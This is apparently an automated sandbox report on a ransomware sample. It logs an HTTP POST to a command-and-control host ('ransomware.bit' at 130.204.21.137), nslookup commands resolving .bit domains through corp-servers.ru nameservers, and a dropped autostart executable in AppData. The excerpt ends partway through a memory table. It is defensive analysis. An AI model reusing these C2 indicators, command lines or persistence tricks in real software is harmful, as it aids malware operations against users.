Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = steass, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: ransomware.bit True 1
Fn
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 130.204.21.137/steass True 1
Fn
Data
Read Response size = 204798, size_out = 552 True 1
Fn
Data
Read Response size = 204798, size_out = 0 True 1
Fn
Close Session - True 4
Fn
Process #7: nslookup.exe
9 22
»
Information Value
ID #7
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup zonealarm.bit ns1.corp-servers.ru
Initial Working Directory C:\Users\FD1HVy\Documents\
Monitor Start Time: 00:01:23, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:04:23
OS Process Information
»
Information Value
PID 0xdec
Parent PID 0xc0c (c:\users\fd1hvy\appdata\local\temp\phfw.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeCreateGlobalPrivilege
Thread IDs
0x AB4
0x 1244
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x00000000002a0000 0x002a0000 0x002bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000002a0000 0x002a0000 0x002affff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000002b0000 0x002b0000 0x002b3fff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x002c1fff Private Memory Readable, Writable True False False -
pagefile_0x00000000002c0000 0x002c0000 0x002c1fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000002d0000 0x002d0000 0x002e7fff Pagefile Backed Memory Readable True False False -
private_0x00000000002f0000 0x002f0000 0x0032ffff Private Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x0036ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000370000 0x00370000 0x00373fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000380000 0x00380000 0x00380fff Pagefile Backed Memory Readable True False False -
private_0x0000000000390000 0x00390000 0x00390fff Private Memory Readable, Writable True False False -
private_0x00000000003a0000 0x003a0000 0x003dffff Private Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x003effff Private Memory Readable, Writable True False False -
pagefile_0x00000000003f0000 0x003f0000 0x003f0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x005fffff Private Memory Readable, Writable True False False -
locale.nls 0x00600000 0x006c4fff Memory Mapped File Readable False False False -
private_0x00000000006d0000 0x006d0000 0x0070ffff Private Memory Readable, Writable True False False -
private_0x0000000000720000 0x00720000 0x0081ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000820000 0x00820000 0x0095cfff Pagefile Backed Memory Readable True False False -
imm32.dll 0x00960000 0x00983fff Memory Mapped File Readable False False False -
private_0x00000000009d0000 0x009d0000 0x009dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000009e0000 0x009e0000 0x00be7fff Pagefile Backed Memory Readable True False False -
nslookup.exe 0x00d00000 0x00d16fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000d20000 0x00d20000 0x02d1ffff Pagefile Backed Memory - True False False -
wow64.dll 0x70200000 0x70250fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x70260000 0x702d2fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x702e0000 0x702e9fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x73300000 0x7330afff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73310000 0x73322fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x73330000 0x73345fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x73350000 0x73360fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73370000 0x73377fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x73380000 0x733c9fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x733d0000 0x7344efff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73670000 0x736bdfff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73770000 0x7379efff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73a10000 0x73a27fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73f60000 0x73f69fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73f70000 0x73f8ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x73f90000 0x73fb0fff Memory Mapped File Readable, Writable, Executable False False False -
ucrtbase.dll 0x74020000 0x74137fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75490000 0x7555ffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75570000 0x75594fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32full.dll 0x75710000 0x75867fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75960000 0x75a1cfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75a80000 0x75bbbfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75bc0000 0x75bc6fff Memory Mapped File Readable, Writable, Executable False False False -
msvcp_win.dll 0x75c20000 0x75c98fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75ca0000 0x75e61fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x765f0000 0x76646fff Memory Mapped File Readable, Writable, Executable False False False -
win32u.dll 0x767c0000 0x767d5fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76b10000 0x76b50fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x76d70000 0x76e2ffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x773a0000 0x77406fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x774a0000 0x7762dfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efa0000 0x7efa0000 0x7f09ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007f0a0000 0x7f0a0000 0x7f0c2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7df9dddaffff Private Memory Readable True False False -
pagefile_0x00007df9dddb0000 0x7df9dddb0000 0x7ff9dddaffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ff9dddb0000 0x7ff9ddf8afff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ff9ddf8b000 0x7ff9ddf8b000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
File (1)
»
Operation Filename Additional Information Success Count Logfile
Write STD_ERROR_HANDLE size = 34 True 1
Fn
Data
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0xd00000 True 1
Fn
Network Behavior
DNS (2)
»
Operation Additional Information Success Count Logfile
Get Hostname name_out = NQdPdE True 1
Fn
Resolve Name host = ns1.corp-servers.ru, address_out = 94.183.71.48, 89.203.10.56, 189.75.183.21, 94.249.60.127 True 1
Fn
UDP Sessions (5)
»
Information Value
Total Data Sent 167 bytes
Total Data Received 0 bytes
Contacted Host Count 1
Contacted Hosts 94.183.71.48:53
UDP Session #1
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 94.183.71.48
Remote Port 53
Local Address -
Local Port -
Data Sent 43 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 94.183.71.48, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 43, size_out = 43 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #2
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 94.183.71.48
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 94.183.71.48, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #3
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 94.183.71.48
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 94.183.71.48, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #4
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 94.183.71.48
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 94.183.71.48, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #5
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 94.183.71.48
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 94.183.71.48, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
Process #9: nslookup.exe
8 16
»
Information Value
ID #9
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup ransomware.bit ns2.corp-servers.ru
Initial Working Directory C:\Users\FD1HVy\Documents\
Monitor Start Time: 00:01:36, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:04:10
OS Process Information
»
Information Value
PID 0x10f4
Parent PID 0xc0c (c:\users\fd1hvy\appdata\local\temp\phfw.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 1118
0x 135C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000230000 0x00230000 0x0024ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000230000 0x00230000 0x0023ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x00243fff Private Memory Readable, Writable True False False -
private_0x0000000000250000 0x00250000 0x00251fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000250000 0x00250000 0x00251fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000260000 0x00260000 0x00277fff Pagefile Backed Memory Readable True False False -
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x002fffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000300000 0x00300000 0x00303fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000310000 0x00310000 0x00310fff Pagefile Backed Memory Readable True False False -
private_0x0000000000320000 0x00320000 0x00320fff Private Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x0036ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000370000 0x00370000 0x00370fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000380000 0x00380000 0x00383fff Private Memory Readable, Writable True False False -
private_0x00000000003a0000 0x003a0000 0x003affff Private Memory Readable, Writable True False False -
private_0x00000000003b0000 0x003b0000 0x003effff Private Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x005fffff Private Memory Readable, Writable True False False -
private_0x0000000000630000 0x00630000 0x0072ffff Private Memory Readable, Writable True False False -
locale.nls 0x00730000 0x007f4fff Memory Mapped File Readable False False False -
pagefile_0x0000000000800000 0x00800000 0x0093cfff Pagefile Backed Memory Readable True False False -
private_0x00000000009f0000 0x009f0000 0x009fffff Private Memory Readable, Writable True False False -
nslookup.exe 0x00d00000 0x00d16fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000d20000 0x00d20000 0x02d1ffff Pagefile Backed Memory - True False False -
wow64.dll 0x70200000 0x70250fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x70260000 0x702d2fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x702e0000 0x702e9fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x73300000 0x7330afff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73310000 0x73322fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x73330000 0x73345fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x73350000 0x73360fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73370000 0x73377fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x73380000 0x733c9fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x733d0000 0x7344efff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73670000 0x736bdfff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73770000 0x7379efff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73a10000 0x73a27fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73f60000 0x73f69fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73f70000 0x73f8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75490000 0x7555ffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75960000 0x75a1cfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75bc0000 0x75bc6fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75ca0000 0x75e61fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x765f0000 0x76646fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76b10000 0x76b50fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x76d70000 0x76e2ffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x773a0000 0x77406fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x774a0000 0x7762dfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007f850000 0x7f850000 0x7f94ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007f950000 0x7f950000 0x7f972fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7df9dddaffff Private Memory Readable True False False -
pagefile_0x00007df9dddb0000 0x7df9dddb0000 0x7ff9dddaffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ff9dddb0000 0x7ff9ddf8afff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ff9ddf8b000 0x7ff9ddf8b000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0xd00000 True 1
Fn
Network Behavior
DNS (2)
»
Operation Additional Information Success Count Logfile
Get Hostname name_out = NQdPdE True 1
Fn
Resolve Name host = ns2.corp-servers.ru, address_out = 89.203.10.56, 94.183.71.48, 94.249.60.127, 189.75.183.21 True 1
Fn
UDP Sessions (3)
»
Information Value
Total Data Sent 107 bytes
Total Data Received 775 bytes
Contacted Host Count 1
Contacted Hosts 89.203.10.56:53
UDP Session #1
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 89.203.10.56
Remote Port 53
Local Address -
Local Port -
Data Sent 43 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 89.203.10.56, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 43, size_out = 43 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #2
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 89.203.10.56
Remote Port 53
Local Address -
Local Port -
Data Sent 32 bytes
Data Received 192 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 89.203.10.56, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 32, size_out = 32 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 192 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #3
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 89.203.10.56
Remote Port 53
Local Address -
Local Port -
Data Sent 32 bytes
Data Received 583 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 89.203.10.56, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 32, size_out = 32 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 583 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
Process #11: ibpbzu.exe
7995 681
»
Information Value
ID #11
File Name c:\users\fd1hvy\appdata\roaming\microsoft\ibpbzu.exe
Command Line "C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe"
Initial Working Directory C:\WINDOWS\system32\
Monitor Start Time: 00:02:46, Reason: Autostart
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:03:00
OS Process Information
»
Information Value
PID 0x1064
Parent PID 0x9a0 (c:\windows\explorer.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 1068
0x 1080
0x 10C0
0x 1100
0x 110C
0x 1110
0x 1114
0x 1118
0x 1204
0x AD0
0x E58
0x AC0
0x 11CC
0x B24
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000040000 0x00040000 0x00057fff Pagefile Backed Memory Readable True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x0006ffff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x0007bfff Private Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000070000 0x00070000 0x00076fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000080000 0x00080000 0x00086fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory Readable, Writable True False False -
private_0x00000000000a0000 0x000a0000 0x000a0fff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x000b0fff Private Memory Readable, Writable True False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable True False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x0013ffff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x0014bfff Private Memory Readable, Writable True False False -
pagefile_0x0000000000130000 0x00130000 0x00136fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000140000 0x00140000 0x00140fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000150000 0x00150000 0x00156fff Pagefile Backed Memory Readable, Writable True False False -
counters2.dat 0x00150000 0x00150fff Memory Mapped File Readable, Writable True True False
private_0x0000000000160000 0x00160000 0x0019ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory Readable True False False -
private_0x00000000001b0000 0x001b0000 0x001b0fff Private Memory Readable, Writable True False False -
private_0x00000000001c0000 0x001c0000 0x001fffff Private Memory Readable, Writable True False False -
private_0x0000000000200000 0x00200000 0x003fffff Private Memory Readable, Writable True False False -
ibpbzu.exe 0x00400000 0x00557fff Memory Mapped File Readable, Writable, Executable True True False
locale.nls 0x00560000 0x00624fff Memory Mapped File Readable False False False -
private_0x0000000000630000 0x00630000 0x00630fff Private Memory Readable, Writable True False False -
winnlsres.dll 0x00640000 0x00644fff Memory Mapped File Readable False False False -
pagefile_0x0000000000650000 0x00650000 0x00651fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000660000 0x00660000 0x00660fff Pagefile Backed Memory Readable, Writable True False False -
winnlsres.dll.mui 0x00670000 0x0067ffff Memory Mapped File Readable False False False -
private_0x0000000000680000 0x00680000 0x006a3fff Private Memory Readable, Writable True False False -
private_0x0000000000680000 0x00680000 0x0069ffff Private Memory Readable, Writable True False False -
private_0x0000000000680000 0x00680000 0x00680fff Private Memory Readable, Writable True False False -
private_0x0000000000690000 0x00690000 0x0069ffff Private Memory Readable, Writable True False False -
private_0x00000000006a0000 0x006a0000 0x006b6fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000006c0000 0x006c0000 0x006fffff Private Memory Readable, Writable True False False -
private_0x0000000000700000 0x00700000 0x0070ffff Private Memory Readable, Writable True False False -
private_0x0000000000710000 0x00710000 0x00710fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000710000 0x00710000 0x00712fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000720000 0x00720000 0x00720fff Pagefile Backed Memory Readable True False False -
private_0x0000000000730000 0x00730000 0x00732fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000730000 0x00730000 0x00730fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000730000 0x00730000 0x00738fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000740000 0x00740000 0x0077ffff Private Memory Readable, Writable True False False -
private_0x0000000000780000 0x00780000 0x007bffff Private Memory Readable, Writable True False False -
private_0x00000000007c0000 0x007c0000 0x008bffff Private Memory Readable, Writable True False False -
private_0x00000000008c0000 0x008c0000 0x009bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000009c0000 0x009c0000 0x00bc7fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000bd0000 0x00bd0000 0x00d50fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000d60000 0x00d60000 0x0215ffff Pagefile Backed Memory Readable True False False -
private_0x0000000002160000 0x02160000 0x022bffff Private Memory Readable, Writable True False False -
private_0x0000000002160000 0x02160000 0x0227ffff Private Memory Readable, Writable True False False -
private_0x0000000002160000 0x02160000 0x0225ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002260000 0x02260000 0x02260fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000002270000 0x02270000 0x0227ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002280000 0x02280000 0x0228ffff Pagefile Backed Memory Readable True False False -
private_0x0000000002290000 0x02290000 0x022a7fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000022b0000 0x022b0000 0x022bffff Private Memory Readable, Writable True False False -
private_0x00000000022c0000 0x022c0000 0x023bffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x023c0000 0x026f6fff Memory Mapped File Readable False False False -
pagefile_0x0000000002700000 0x02700000 0x02afffff Pagefile Backed Memory Readable True False False -
private_0x0000000002b00000 0x02b00000 0x02bfffff Private Memory Readable, Writable True False False -
private_0x0000000002c00000 0x02c00000 0x02cfffff Private Memory Readable, Writable True False False -
private_0x0000000002d00000 0x02d00000 0x02dfffff Private Memory Readable, Writable True False False -
private_0x0000000002e00000 0x02e00000 0x02e3ffff Private Memory Readable, Writable True False False -
private_0x0000000002e40000 0x02e40000 0x02f3ffff Private Memory Readable, Writable True False False -
private_0x0000000002f40000 0x02f40000 0x02f7ffff Private Memory Readable, Writable True False False -
private_0x0000000002f40000 0x02f40000 0x02f40fff Private Memory Readable, Writable True False False -
private_0x0000000002f50000 0x02f50000 0x02f50fff Private Memory Readable, Writable True False False -
private_0x0000000002f50000 0x02f50000 0x02f51fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002f60000 0x02f60000 0x02f60fff Private Memory Readable, Writable True False False -
private_0x0000000002f70000 0x02f70000 0x02f70fff Private Memory Readable, Writable True False False -
private_0x0000000002f80000 0x02f80000 0x02f80fff Private Memory Readable, Writable True False False -
private_0x0000000002f90000 0x02f90000 0x02f90fff Private Memory Readable, Writable True False False -
private_0x0000000002fa0000 0x02fa0000 0x02fa0fff Private Memory Readable, Writable True False False -
wow64.dll 0x68d50000 0x68da0fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x68db0000 0x68db9fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x68dc0000 0x68e32fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x732d0000 0x73319fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73320000 0x73327fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73330000 0x733aefff Memory Mapped File Readable, Writable, Executable False False False -
msiso.dll 0x733b0000 0x73410fff Memory Mapped File Readable, Writable, Executable False False False -
